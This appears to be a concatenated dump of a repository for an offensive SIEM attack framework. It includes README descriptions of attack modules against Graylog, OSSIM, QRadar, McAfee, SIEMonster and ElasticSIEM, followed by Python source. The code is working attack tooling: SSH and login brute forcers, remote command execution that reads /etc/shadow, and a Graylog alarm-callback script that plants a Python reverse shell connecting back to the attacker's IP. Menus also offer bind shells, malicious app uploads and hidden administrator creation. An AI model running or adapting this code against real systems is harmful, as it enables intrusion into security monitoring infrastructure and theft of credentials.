kept. 106 | 107 | #### 2nd Attack: Test for Graylog AMI/OVA Default Credentials 108 | This attack module verifies if the Graylog to be analyzed has default credentials on Graylog web interface (admin/admin), as well as if it has default credentials to connect to the system by console or SSH (ubuntu/ubuntu). These couple of credentials are configured by default on Graylog virtual machine appliances, both on OVA and AMI. 109 | 110 | #### 3rd Attack: Test connection to MongoDB and Obtain Credentials for LDAP and AWS 111 | This attack module verifies if the Graylog to be analyzed has Mongo DB database configured with no authentication. In such a case, it connects to MongoDB and obtains configuration information, LDAP credentials (depending on the current Graylog version they may be in plain text or encrypted) and access and secret keys configured in the AWS plugin. In case it is encrypted, LDAP user key is encrypted with AES CBC. They key is the first 16 bits of the field password_secret, located in the configuration file server.conf, or graylog.conf in case of standard installations; or the field secret_token located in the file graylog-secrets.json in case of OVA installations, the IV is the salt showed on the screen. 112 | 113 | #### 4th Attack: Obtain Credentials for LDAP and AWS from REST API 114 | This attack module obtains information on configuration and credentials for LDAP and AWS in plain text from Graylog REST API. To use this module Graylog admin credentials are needed. 115 | 116 | 117 | ### Ossim Attack Modules 118 | By entering “y” and selecting the launch of OSSIM attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones OSSIM admin credentials are needed. 119 | 120 | #### 1st Attack: Dictionary Attack on OSSIM Web Interface 121 | This attack module contains a specific dictionary for OSSIM named dict.txt, which is made up of the 100 most used password over 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /ossim/dict.txt can be replaced with any other word list, provided that the file name is kept. 122 | 123 | #### 2nd Attack: Obtain OSSIM Configuration Information 124 | This attack module allows to obtain configuration information from OSSIM server. To use it, OSSIM admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation: defined users, login parameters including LDAP configurations and password policies. 125 | 126 | #### 3rd Attack: Configure Malicious Policy and Action to Obtain Reserve Shell on OSSIM 127 | This attack module allows to obtain a reverse shell from OSSIM server to the attacker’s system. To use it, OSSIM admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The module develops a malicious action that will be connected via netcat to the attacker’s system. Then, it triggers a new policy that uses such action to warn in case any security event occurs, and this event is triggered through an unsuccessful SSH login attempt to OSSIM server. Consequently, a reverse shell is obtained from the OSSIM server to the attacker’s system in port 12345 with root privileges. 128 | 129 | 130 | ### QRadar Attack Modules 131 | By entering “y” and selecting the launch of QRadar attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first two attack no credentials are required, but for the subsequent ones QRadar admin credentials or API Key are needed. 132 | 133 | #### 1st Attack: Dictionary Attack on QRadar Web Interface 134 | This attack module contains a specific dictionary for QRadar named dict.txt, which is made up of the 100 most used password over 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /qradar/dict.txt can be replaced with any other word list, provided that the file name is kept. This attack is very slow because QRadar have a protection that permits only to 5 attempts each 30 minutes. 135 | 136 | #### 2nd Attack: Dictionary Attack on QRadar API Keys 137 | This attack module contains a specific dictionary for QRadar named apikeys.txt, which is made up of the 1000 different options of API keys that keep the structure that needs in this SIEM. In case you wish to use any other list different from the one mentioned above, /qradar/dict.txt can be replaced with any other word list, provided that the file name is kept. The program gives to option of you could create the file with API keys aleatorily. 138 | 139 | #### 3rd Attack: Obtain QRadar Server Configuration Information 140 | This attack module allows us to obtain the server configuration through to use of API Key. To use it, QRadar API Key admin is needed, and they can be obtained for instance through a dictionary attack (2nd attack). The result of the module is the relevant configuration information of the current installation: defined users, network hierarchy, and deployment hosts. 141 | 142 | #### 4th Attack: Obtain list of usernames of databases Ariel on QRadar 143 | This attack module allows us to obtain the list of user that is saved in Ariel database. To use it, QRadar API Key admin is needed, and they can be obtained for instance through a dictionary attack (2nd attack). The result of the module is the relevant configuration information of the users that have had contact with Ariel database. 144 | 145 | 146 | ### McAfee Attack Modules 147 | By entering “y” and selecting the launch of McAfee attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones McAfee admin credentials are needed. 148 | 149 | #### 1st Attack: Dictionary Attack on McAfee Web Interface 150 | This attack module contains a specific dictionary for McAfee named dict.txt, which is made up of 7000 passwords creates aleatorily with various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /mcafee/dict.txt can be replaced with any other word list, provided that the file name is kept. This attack is very slow because McAfee have a protection that permits only to 3 attempts each 10 minutes. 151 | 152 | #### 2nd Attack: Dictionary Attack on McAfee SSH Server 153 | This attack module contains a specific dictionary for McAfee named dict.txt, which is made up of 7000 passwords creates aleatorily with various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /mcafee/dict.txt can be replaced with any other word list, provided that the file name is kept. 154 | 155 | #### 3rd Attack: Obtain McAfee Server Configuration Information 156 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (2nd attack). The result of the module is the relevant configuration information of the current installation: nameserver on the network, active services, network configuration, and firewall configuration. 157 | 158 | #### 4th Attack: Obtain McAfee Server Information 159 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (2nd attack). The result of the module is the relevant configuration information of the current installation: Number of release of SIEM, hdd data, ram data, processor data, active time, status next check date, status rules check date, and backup next date. 160 | 161 | #### 5th Attack: Obtain shadow file of McAfee Server 162 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (2nd attack). The result of the module is the relevant information about system users. 163 | 164 | 165 | ### SIEMonster Attack Modules 166 | By entering “y” and selecting the launch of SIEMonster attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones SIEMonster admin credentials are needed. 167 | 168 | #### 1st Attack: Dictionary Attack on SIEMonster SSH Interface 169 | This attack module contains a specific dictionary for SIEMonster named dict.txt, which is made up of 7000 passwords creates aleatorily with various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /siemonster/dict.txt can be replaced with any other word list, provided that the file name is kept. 170 | 171 | #### 2nd Attack: Obtain SIEMonster Server Information 172 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation: nameserver on the network, active docker's containers, list of active services, network configuration, and firewall configuration. 173 | 174 | #### 3th Attack: Obtain shadow file of SIEMonster Server 175 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the relevant information about system users. 176 | 177 | 178 | ### ElasticSIEM Attack Modules 179 | By entering “y” and selecting the launch of ElasticSIEM attack modules, the tool shows all the possible attacks to be performed against this SIEM. For the first attack no credentials are required, but for the subsequent ones ElasticSIEM admin credentials are needed. 180 | 181 | #### 1st Attack: Dictionary Attack on ElasticSIEM SSH Server 182 | This attack module contains a specific dictionary for ElasticSIEM named dict.txt, which is made up of the 7000 most used password over 2018 and various permutations of the SIEM trade name and its admin user, in uppercase and lowercase letters, and replacing vowels with numbers. In case you wish to use any other list different from the one mentioned above, /elasticsiem/dict.txt can be replaced with any other word list, provided that the file name is kept. 183 | 184 | #### 2nd Attack: Obtain SIEMonster Server Information 185 | This attack module allows us to obtain the server configuration through to use of admin credentials. To use it, SSH admin credentials are needed, and they can be obtained for instance through a dictionary attack (1st attack). The result of the module is the relevant configuration information of the current installation: nameserver on the network, active docker's containers, list of active services, and network configuration. 186 | 187 | 188 | ## CONTRIBUTING AND SUPPORT 189 | 190 | Please report any error by opening an issue in GitHub. Your collaboration is very appreciated! -------------------------------------------------------------------------------- /elasticsiem/bruteforcessh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # ElasticSIEM SSH Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import nmap 9 | import logging 10 | import globals 11 | import paramiko 12 | 13 | from colorama import Fore 14 | from colorama import Style 15 | 16 | 17 | # %%%%%%%%%% Functions %%%%%%%%%# 18 | 19 | 20 | def elastic_ssh_brute(ip): 21 | username = input(Fore.CYAN + Style.NORMAL + 22 | "[!] Enter username of operations system: ") 23 | __location__ = os.path.realpath( 24 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 25 | file = open(os.path.join(__location__, 'dict.txt')) 26 | nm = nmap.PortScanner() 27 | bps = 0 28 | if username == '': 29 | username = 'root' 30 | 31 | try: 32 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 33 | if nm[ip]['tcp'][22]['state'] == 'open': 34 | for line in file: 35 | password = line.strip('\n\r') 36 | if ssh_credentials(ip, password, username): 37 | mess = [username, password] 38 | globals.messages(7) 39 | globals.messages(9, mess) 40 | file.close() 41 | bps = 1 42 | break 43 | if bps == 0: 44 | globals.messages(8) 45 | file.close() 46 | else: 47 | globals.messages(8) 48 | file.close() 49 | 50 | except Exception as e: 51 | globals.messages(8) 52 | file.close() 53 | logging.error(e, exc_info=True) 54 | 55 | 56 | def ssh_credentials(ip, password, username): 57 | ssh = paramiko.SSHClient() 58 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 59 | try: 60 | ssh.connect(ip, username=username, password=password, 61 | banner_timeout=2000) 62 | return True 63 | except paramiko.AuthenticationException: 64 | return False 65 | -------------------------------------------------------------------------------- /elasticsiem/sysinfo_elastic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of ElasticSIEM with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | # %%%%%%%%%% Functions %%%%%%%%%# 13 | 14 | 15 | def elastic_ssh_info(ip): 16 | username = input(Fore.CYAN + Style.NORMAL + 17 | "[!] Enter ElasticSIEM's username: " + Style.RESET_ALL) 18 | password = input(Fore.CYAN + Style.NORMAL + 19 | "[!] Enter ElasticSIEM's password: " + Style.RESET_ALL) 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.load_system_host_keys() 23 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 24 | try: 25 | ssh.connect(ip, username=username, password=password, 26 | banner_timeout=200) 27 | globals.elastic_messages(1) 28 | 29 | commands = [ 30 | ("hostname", "[!] Hostname"), 31 | ("ls -1 /etc/rc5.d", "[!] List service active"), 32 | ("ifconfig", "[!] Network Configuration"), 33 | ('netstat -putan | grep LISTEN', "[!] Ports active") 34 | ] 35 | 36 | for command in commands: 37 | std, stdout, stderr = ssh.exec_command(command[0]) 38 | if stdout != "": 39 | print('') 40 | print(Fore.GREEN + Style.NORMAL + command[1]) 41 | print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR + 42 | Style.RESET_ALL) 43 | for i in stdout.readlines(): 44 | print('[!] ' + i.replace('\n', '')) 45 | 46 | ssh.close() 47 | 48 | except paramiko.AuthenticationException: 49 | globals.messages(10) 50 | ssh.close() 51 | 52 | # %%%%%%%%%% The End %%%%%%%%%%# 53 | -------------------------------------------------------------------------------- /globals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Variables and Functions globals in Framework 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | from colorama import Fore, Style 8 | 9 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 10 | 11 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 12 | SSH_PORT = 22 13 | HTTPS_TCP_PORT = 443 14 | SPLUNK_TCP_PORT = 8089 15 | GRAYLOG_TCP_PORT = 9000 16 | ELASTIC_TCP_PORT = 5601 17 | 18 | https = "https://" 19 | http = "http://" 20 | 21 | 22 | ip_val = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$''' 23 | net_val = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)/(2[0-4]|[0-1]?[0-9][0-9]?)$''' 24 | 25 | agents = [ 26 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)' 27 | ' Chrome/79.0.3945.88 Safari/537.36', 28 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0', 29 | 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0', 30 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)' 31 | ' Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41' 32 | ] 33 | 34 | 35 | # %%%%%%%%%%% Menus %%%%%%%%%%%# 36 | main_menu = ["Scan and Detect SIEM", 37 | "Find SIEMs on the network"] 38 | # "Update SIEMs Framework", 39 | # "Update Supporting Components" 40 | 41 | splunk_menu = ["Dictionary Attack on Splunk Server or Universal Forwarder User" 42 | " Admin via Management Port", 43 | "Obtain Server and Session Information via Web Interface", 44 | "Obtain Server or Universal Forwarder System Information via " 45 | "Management Port (Admin Credentials Needed)", 46 | "Obtain Splunk Server Apps Stored Passwords with Secret " 47 | "(Admin Credentials Needed)", 48 | "Read /etc/shadow file from Splunk Server " 49 | "(Linux Only - Admin Credentials Needed)", 50 | "Deploy Malicious App to Forwarders via Deployment Server " 51 | "(Admin Credentials Needed)", 52 | "Upload Malicious App to Splunk Server or Universal Forwarder " 53 | "(Admin Credentials Needed)", 54 | "Test for Splunk VMware OVA Default Credentials" 55 | ] 56 | 57 | graylog_menu = ["Dictionary Attack on Graylog Web Interface User Admin", 58 | "Test for AMI/OVA Default Credentials", 59 | "Obtain Configuration and Credentials for LDAP and AWS from " 60 | "REST API (Admin Credentials Needed)", 61 | "Obtain Credentials in Graylog Inputs from REST API " 62 | "(Admin Credentials Needed)", 63 | "Create and Test Alarm Callback to Obtain Reverse Shell " 64 | "(Admin Credentials Needed)" 65 | ] 66 | 67 | ossim_menu = ["Dictionary Attack on OSSIM Web Interface User Admin", 68 | "Obtain OSSIM Server Configuration Information " 69 | "(Admin Credentials Needed)", 70 | "Upload OSSIM Malicious Policy and Action to Obtain Reverse " 71 | "Shell (AdminCredentials Needed)" 72 | ] 73 | 74 | qradar_menu = ["Dictionary Attack on QRadar Web Interface User Admin " 75 | "(Very Slow)", 76 | "Dictionary Attack on QRadar with API Key of User Admin", 77 | "Obtain QRadar Server Configuration Information " 78 | "(API Key Needed)", 79 | "Obtain list of usernames of databases Ariel on QRadar " 80 | "(API Key Needed)" 81 | ] 82 | 83 | mcafee_menu = ["Dictionary Attack on McAfee Web Interface User Admin (Slow)", 84 | "Dictionary Attack on McAfee SSH of User Admin", 85 | "Obtain McAfee Server Configuration (Admin Credentials Needed)", 86 | "Obtain McAfee Server Information (Admin Credentials Needed)", 87 | "Obtain shadow file of server (Admin Credentials Needed)" 88 | ] 89 | 90 | smonster_menu = ["Dictionary Attack on SIEMonster SSH of User Admin", 91 | "Obtain SIEMonster Information (Admin Credentials Needed)", 92 | "Obtain shadow file of server (Admin Credentials Needed)" 93 | ] 94 | 95 | elastic_menu = ["Dictionary Attack on ElasticSIEM SSH of User Admin", 96 | "Obtain ElasticSIEM Server Information " 97 | "(Admin Credentials Needed)" 98 | ] 99 | 100 | app_menu = ["Linux Splunk Server or Universal Forwarder Reverse Shell", 101 | "Linux Splunk Server or Universal Forwarder Bind Shell", 102 | "Windows Splunk Server Reverse Shell", 103 | "Windows Splunk Server Bind Shell", 104 | "Windows Splunk Universal Forwarder Add Administrator User", 105 | "Windows Splunk Universal Forwarder Executable Bind Shell" 106 | ] 107 | 108 | username = "[!] Username: " 109 | password = "[!] Password: " 110 | 111 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 112 | 113 | 114 | def messages(op, message=None): 115 | if message is None: 116 | message = [] 117 | print('\n') 118 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR) 119 | if op == 1: 120 | print(Fore.GREEN + Style.BRIGHT + '[!] Select from the menu: ') 121 | elif op == 2: 122 | print(Fore.YELLOW + Style.BRIGHT + 123 | '[!] Choice error please select again: ') 124 | elif op == 3: 125 | print(Fore.YELLOW + Style.BRIGHT + 126 | '[*] IP or Port data error. Try again') 127 | elif op == 4: 128 | print(Fore.YELLOW + Style.BRIGHT + '[*] Net data error. Try again') 129 | elif op == 5: 130 | print(Fore.YELLOW + "[!] The SIEM detected is: " + Fore.RED + 131 | Style.BRIGHT + message[0]) 132 | print(Fore.YELLOW + "[!] The SIEM is working on the port: " + 133 | Fore.RED + Style.BRIGHT + message[1]) 134 | elif op == 6: 135 | print(Fore.YELLOW + Style.BRIGHT + 136 | "[!] SIEMs Detected on the Network: ") 137 | elif op == 7: 138 | print(Fore.GREEN + Style.BRIGHT + "[!] Dictionary Attack Successful!") 139 | elif op == 8: 140 | print(Fore.RED + Style.BRIGHT + 141 | "[!] Dictionary Attack Not Successful") 142 | elif op == 9: 143 | print(Fore.YELLOW + Style.BRIGHT + username + 144 | Fore.RED + Style.BRIGHT + message[0]) 145 | print(Fore.YELLOW + password + Fore.RED + Style.BRIGHT + message[1]) 146 | elif op == 10: 147 | print(Fore.RED + Style.BRIGHT + "[*] Authentication Error") 148 | 149 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR + Style.RESET_ALL) 150 | 151 | 152 | def splunk_messages(op, message=None): 153 | if message is None: 154 | message = [] 155 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 156 | if op == 1: 157 | print(Fore.GREEN + Style.NORMAL + "[!] List of Installed Apps:") 158 | elif op == 2: 159 | print(Fore.GREEN + Style.NORMAL + 160 | "[!] Application Successfully Installed " 161 | + Fore.RED + Style.BRIGHT + message[0]) 162 | elif op == 3: 163 | print(Fore.RED + Style.NORMAL + 164 | "[!] Error with the app selection [!]") 165 | elif op == 4: 166 | print(Fore.GREEN + Style.NORMAL + 167 | "[!] Currently stored credentials:") 168 | elif op == 5: 169 | print("[*] Credential Name: " + message[0]) 170 | print("[*] Username: " + Fore.RED + Style.BRIGHT + message[1]) 171 | print("[*] Encrypted Password: " + message[2]) 172 | print("[*] Clear Password: " + Fore.RED + Style.BRIGHT + message[3]) 173 | elif op == 6: 174 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Server Information") 175 | elif op == 7: 176 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Session Information") 177 | elif op == 8: 178 | print(Fore.GREEN + Style.NORMAL + "[!] Splunk Config Web") 179 | elif op == 9: 180 | print(Fore.GREEN + Style.NORMAL + "[!] File /etc/shadow content:") 181 | elif op == 10: 182 | print(Fore.GREEN + Style.NORMAL + 183 | "[!] Splunk VMWare OVA SSH Default Credentials Found!") 184 | elif op == 11: 185 | print(Fore.GREEN + Style.NORMAL + 186 | "[!] Splunk SSH Default Credential for " 187 | + message[0] + " Not Found") 188 | 189 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 190 | 191 | 192 | def ossim_messages(op, message=None): 193 | if message is None: 194 | message = [] 195 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 196 | if op == 1: 197 | print(Fore.GREEN + Style.NORMAL + 198 | "[!] Start a listener in port 12345, for example nc -lvp 12345") 199 | elif op == 2: 200 | print(Fore.GREEN + Style.NORMAL + 201 | "[!] OSSIM Reverse Shell Action Created with ID " + message[0]) 202 | print(Fore.GREEN + Style.NORMAL + 203 | "[!] OSSIM Policies CTX Obtained " + message[1]) 204 | elif op == 3: 205 | print(Fore.RED + Style.NORMAL + 206 | "[!] Error creating the OSSIM Reverse Shell Action") 207 | elif op == 4: 208 | print(Fore.GREEN + Style.NORMAL + "[!] OSSIM New Policy Created") 209 | elif op == 5: 210 | print(Fore.GREEN + Style.NORMAL + "[!] Policies Reloaded and Applied") 211 | elif op == 6: 212 | print(Fore.RED + Style.NORMAL + 213 | "[!] Error creating the OSSIM New Policy") 214 | elif op == 7: 215 | print(Fore.RED + Style.NORMAL + "[!] SSH Failed Login Event Generated") 216 | print(Fore.RED + Style.BRIGHT + "[!] Reverse Shell Ready") 217 | elif op == 8: 218 | print(Fore.GREEN + Style.NORMAL + 219 | "[!] OSSIM Users, Emails and Company") 220 | elif op == 9: 221 | print(Fore.GREEN + Style.NORMAL + 222 | "[!] OSSIM Login Methods and Parameters") 223 | elif op == 10: 224 | print(Fore.GREEN + Style.NORMAL + "[!] OSSIM Password Policies") 225 | 226 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 227 | 228 | 229 | def graylog_messages(op): 230 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 231 | if op == 1: 232 | print(Fore.GREEN + Style.NORMAL + 233 | "[!] Graylog LDAP Settings and Credentials") 234 | elif op == 2: 235 | print(Fore.GREEN + Style.NORMAL + 236 | "[!] Error obtaining Graylog LDAP Settings and Credentials") 237 | elif op == 3: 238 | print(Fore.GREEN + Style.NORMAL + 239 | "[!] Graylog AWS Settings and Credentials") 240 | elif op == 4: 241 | print(Fore.GREEN + Style.NORMAL + 242 | "[!] Error obtaining Graylog AWS Settings and Credentials") 243 | elif op == 5: 244 | print(Fore.GREEN + Style.NORMAL + 245 | "[!] Graylog Inputs with Secret Keys or Passwords") 246 | elif op == 6: 247 | print(Fore.RED + Style.NORMAL + "[!] Error obtaining Graylog Inputs") 248 | elif op == 7: 249 | print(Fore.RED + Style.NORMAL + "[!] Mongo DB without Authentication") 250 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 251 | print(Fore.GREEN + Style.NORMAL + "[!] LDAP Settings") 252 | elif op == 8: 253 | print(Fore.GREEN + Style.NORMAL + 254 | "[!] LDAP Password Encrypted with AES CBC, Key is" 255 | " Graylog PasswordSecret and IV is the Salt") 256 | elif op == 9: 257 | print(Fore.GREEN + Style.NORMAL + "[!] AWS Access Key and Secret Key") 258 | elif op == 10: 259 | print(Fore.RED + Style.NORMAL + 260 | "[!] Problem with MongoDB Authentication") 261 | elif op == 11: 262 | print(Fore.RED + Style.NORMAL + 263 | "[!] MongoDB port is closed or unreachable") 264 | elif op == 12: 265 | print(Fore.GREEN + Style.NORMAL + 266 | "[!] Graylog Web Interface Default Credentials Found!") 267 | elif op == 13: 268 | print(Fore.RED + Style.NORMAL + 269 | "[!] Graylog Web Interface Default Credentials" 270 | " Not Found, Try Bruteforce Module") 271 | elif op == 14: 272 | print(Fore.GREEN + Style.NORMAL + 273 | "[!] Graylog SSH Default Credentials Found!") 274 | elif op == 15: 275 | print(Fore.RED + Style.NORMAL + 276 | "[!] Graylog SSH Default Credentials Not Found") 277 | 278 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 279 | 280 | 281 | def qradar_messages(op, message=''): 282 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 283 | if op == 1: 284 | print(Fore.RED + Style.BRIGHT + 285 | "[*] Error with number entered for quantity apikey") 286 | elif op == 2: 287 | print("[!] API Key: " + Fore.RED + Style.BRIGHT + message) 288 | elif op == 3: 289 | print(Fore.GREEN + Style.NORMAL + "[!] System information of QRadar :") 290 | elif op == 4: 291 | print(Fore.GREEN + Style.NORMAL + "[!] Users of QRadar :") 292 | elif op == 5: 293 | print(Fore.GREEN + Style.NORMAL + 294 | "[!] Networks configured in QRadar :") 295 | elif op == 6: 296 | print(Fore.GREEN + Style.NORMAL + 297 | "[!] Query of usernames AQL was Successful!") 298 | elif op == 7: 299 | print(Fore.RED + Style.NORMAL + 300 | "[!] Query of usernames AQL wasn't Successful!") 301 | 302 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 303 | 304 | 305 | def mcafee_messages(op): 306 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 307 | if op == 1: 308 | print(Fore.GREEN + Style.NORMAL + "[!] System information of McAfee :") 309 | elif op == 2: 310 | print(Fore.GREEN + Style.BRIGHT + "[*] Users McAfee server:") 311 | 312 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 313 | 314 | 315 | def smonster_messages(op): 316 | print(Fore.GREEN + Style.NORMAL + SEPARATOR) 317 | if op == 1: 318 | print(Fore.GREEN + Style.NORMAL + 319 | "[!] System information of SIEMonster :") 320 | elif op == 2: 321 | print(Fore.GREEN + Style.BRIGHT + "[*] Users SIEMonter Server:") 322 | 323 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 324 | 325 | 326 | def elastic_messages(op): 327 | if op == 1: 328 | print(Fore.GREEN + Style.NORMAL + 329 | "[!] System information of ElasticSIEM: ") 330 | 331 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 332 | -------------------------------------------------------------------------------- /graylog/alarmcallback.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Create Alarm Callback to Obtain Reverse Shell 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import logging 9 | import urllib3 10 | import globals 11 | import requests 12 | import colorama 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | 17 | colorama.init() 18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def alarm_callback(ip, port): 24 | graylogpass = getpass.getpass( 25 | Fore.CYAN + Style.BRIGHT + "[!] Enter Graylog Admin Password: " + 26 | Style.RESET_ALL) 27 | 28 | local_ip = input("[!] Enter your local IP address: ") 29 | alertid = "000000000000000000000000" 30 | authurl = globals.http + ip + ":" + str( 31 | port) + "/api/system/sessions" 32 | typesurl = globals.http + ip + ":" + str( 33 | port) + "/api/alerts/callbacks/types" 34 | alarmsurl = globals.http + ip + ":" + str( 35 | port) + "/api/streams/000000000000000000000001/alarmcallbacks" 36 | 37 | bashcommand = \ 38 | "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"\ 39 | "socket.SOCK_STREAM);s.connect((\"" + local_ip + \ 40 | "\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),"\ 41 | "1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" 42 | 43 | params = { 44 | "title": "testgraylog", 45 | "type": "ir.elenoon.ExeCommandAlarmCallBack", 46 | "configuration": { 47 | "bashCommand": bashcommand 48 | } 49 | } 50 | headers = {'X-Requested-By': 'XMLHttpRequest'} 51 | authparams = { 52 | 'username': 'admin', 53 | 'password': graylogpass, 54 | 'host': ip 55 | } 56 | 57 | globals.graylog_messages(1) 58 | try: 59 | s = requests.Session() 60 | s.headers.update(headers) 61 | s.auth = ('admin', graylogpass) 62 | s.post(authurl, json=authparams, verify=False) 63 | response = s.get(typesurl, verify=False) 64 | 65 | # text of graylog2 plugin exec 66 | if response.status_code == 200 and "ir.elenoon.ExeCommandAlarmCallBack" in response.text: 67 | globals.graylog_messages(2) 68 | postresponse = s.post(alarmsurl, json=params, verify=False) 69 | 70 | if postresponse.status_code == 201: # created status code 71 | globals.graylog_messages(3) 72 | data = postresponse.json() 73 | alertid = str(data['alarmcallback_id']) 74 | 75 | if alertid != "000000000000000000000000": 76 | print("[!] Alarm Callback ID: " + alertid) 77 | testurl = \ 78 | globals.http + ip + ":9000/api/alerts/callbacks/" + \ 79 | alertid + "/test" 80 | testresponse = s.post(testurl, verify=False) 81 | 82 | if testresponse.status_code == 200: 83 | globals.graylog_messages(4) 84 | else: 85 | globals.graylog_messages(5) 86 | else: 87 | globals.graylog_messages(6) 88 | 89 | else: 90 | globals.graylog_messages(7) 91 | 92 | else: 93 | globals.graylog_messages(8) 94 | 95 | except Exception as e: 96 | logging.error(e, exc_info=True) 97 | 98 | # %%%%%%%%%% The End %%%%%%%%%%# 99 | -------------------------------------------------------------------------------- /graylog/bruteforcegraylog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Graylog Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import logging 9 | import globals 10 | import requests 11 | 12 | # %%%%%%%%%% Functions %%%%%%%%%# 13 | 14 | 15 | def graylog_brute(ip, port): 16 | 17 | url = \ 18 | globals.http + ip + ":" + str(port) + "/api/system/sessions" 19 | __location__ = os.path.realpath(os.path.join( 20 | os.getcwd(), os.path.dirname(__file__))) 21 | files = open(os.path.join(__location__, 'dict.txt')) 22 | bruteforcesuccesfull = 0 23 | 24 | for line in files: 25 | password = line.strip('\n\r') 26 | params = { 27 | 'username': 'admin', 28 | 'password': password, 29 | 'host': ip} 30 | headers = {'X-Requested-By': 'XMLHttpRequest'} 31 | 32 | try: 33 | response = requests.post( 34 | url, json=params, headers=headers, verify=False) 35 | 36 | if response.status_code == 200: 37 | globals.messages(7) 38 | mess = ['admin', password] 39 | globals.messages(9, mess) 40 | bruteforcesuccesfull = 1 41 | files.close() 42 | break 43 | 44 | except Exception as e: 45 | logging.error(e, exc_info=True) 46 | 